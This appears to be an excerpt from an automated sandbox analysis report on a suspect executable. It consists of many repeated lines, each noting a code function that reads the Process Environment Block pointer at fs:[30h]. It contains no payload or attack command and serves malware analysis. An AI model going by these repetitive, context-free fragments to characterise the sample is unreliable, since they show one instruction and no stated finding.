          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B54120 mov ecx, dword ptr fs:[00000030h]1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]1_2_00B3B171
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]1_2_00B3B171
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C962 mov eax, dword ptr fs:[00000030h]1_2_00B3C962
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]1_2_00B5B944
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]1_2_00B5B944
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B4AAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B4AAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]1_2_00B6FAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]1_2_00B6D294
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]1_2_00B6D294
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62AE4 mov eax, dword ptr fs:[00000030h]1_2_00B62AE4
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62ACB mov eax, dword ptr fs:[00000030h]1_2_00B62ACB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]1_2_00B74A2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]1_2_00B74A2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08A62 mov eax, dword ptr fs:[00000030h]1_2_00C08A62
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B35210 mov ecx, dword ptr fs:[00000030h]1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]1_2_00B3AA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]1_2_00B3AA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B53A1C mov eax, dword ptr fs:[00000030h]1_2_00B53A1C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]1_2_00BFAA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]1_2_00BFAA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B48A0A mov eax, dword ptr fs:[00000030h]1_2_00B48A0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7927A mov eax, dword ptr fs:[00000030h]1_2_00B7927A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]1_2_00BEB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]1_2_00BEB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFEA55 mov eax, dword ptr fs:[00000030h]1_2_00BFEA55
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BC4257 mov eax, dword ptr fs:[00000030h]1_2_00BC4257
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62397 mov eax, dword ptr fs:[00000030h]1_2_00B62397
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6B390 mov eax, dword ptr fs:[00000030h]1_2_00B6B390
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF138A mov eax, dword ptr fs:[00000030h]1_2_00BF138A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]1_2_00B41B8F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]1_2_00B41B8F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BED380 mov ecx, dword ptr fs:[00000030h]1_2_00BED380
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]1_2_00B5DBE9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C05BA5 mov eax, dword ptr fs:[00000030h]1_2_00C05BA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]1_2_00BB53CA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]1_2_00BB53CA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08B58 mov eax, dword ptr fs:[00000030h]1_2_00C08B58
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF131B mov eax, dword ptr fs:[00000030h]1_2_00BF131B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]1_2_00B63B7A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]1_2_00B63B7A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3DB60 mov ecx, dword ptr fs:[00000030h]1_2_00B3DB60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3F358 mov eax, dword ptr fs:[00000030h]1_2_00B3F358
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3DB40 mov eax, dword ptr fs:[00000030h]1_2_00B3DB40
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08CD6 mov eax, dword ptr fs:[00000030h]1_2_00C08CD6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4849B mov eax, dword ptr fs:[00000030h]1_2_00B4849B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF14FB mov eax, dword ptr fs:[00000030h]1_2_00BF14FB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6BC2C mov eax, dword ptr fs:[00000030h]1_2_00B6BC2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5746D mov eax, dword ptr fs:[00000030h]1_2_00B5746D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]1_2_00BCC450
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]1_2_00BCC450
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A44B mov eax, dword ptr fs:[00000030h]1_2_00B6A44B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B635A1 mov eax, dword ptr fs:[00000030h]1_2_00B635A1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]1_2_00B6FD9B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]1_2_00B6FD9B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]1_2_00BE8DF1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]1_2_00C005AC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]1_2_00C005AC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3AD30 mov eax, dword ptr fs:[00000030h]1_2_00B3AD30
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFE539 mov eax, dword ptr fs:[00000030h]1_2_00BFE539
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BBA537 mov eax, dword ptr fs:[00000030h]1_2_00BBA537
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]1_2_00B5C577
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]1_2_00B5C577
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B57D50 mov eax, dword ptr fs:[00000030h]1_2_00B57D50
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08D34 mov eax, dword ptr fs:[00000030h]1_2_00C08D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B73D43 mov eax, dword ptr fs:[00000030h]1_2_00B73D43
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB3540 mov eax, dword ptr fs:[00000030h]1_2_00BB3540
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08ED6 mov eax, dword ptr fs:[00000030h]1_2_00C08ED6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB46A7 mov eax, dword ptr fs:[00000030h]1_2_00BB46A7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFE87 mov eax, dword ptr fs:[00000030h]1_2_00BCFE87
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B616E0 mov ecx, dword ptr fs:[00000030h]1_2_00B616E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B476E2 mov eax, dword ptr fs:[00000030h]1_2_00B476E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B78EC7 mov eax, dword ptr fs:[00000030h]1_2_00B78EC7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B636CC mov eax, dword ptr fs:[00000030h]1_2_00B636CC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]1_2_00BEFEC0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEFE3F mov eax, dword ptr fs:[00000030h]1_2_00BEFE3F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3E620 mov eax, dword ptr fs:[00000030h]1_2_00B3E620
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]1_2_00B6A61C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]1_2_00B6A61C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B68E00 mov eax, dword ptr fs:[00000030h]1_2_00B68E00
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1608 mov eax, dword ptr fs:[00000030h]1_2_00BF1608
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4766D mov eax, dword ptr fs:[00000030h]1_2_00B4766D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]1_2_00B47E41
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]1_2_00BFAE44
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]1_2_00BFAE44
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B48794 mov eax, dword ptr fs:[00000030h]1_2_00B48794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]1_2_00BB7794
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B737F5 mov eax, dword ptr fs:[00000030h]1_2_00B737F5
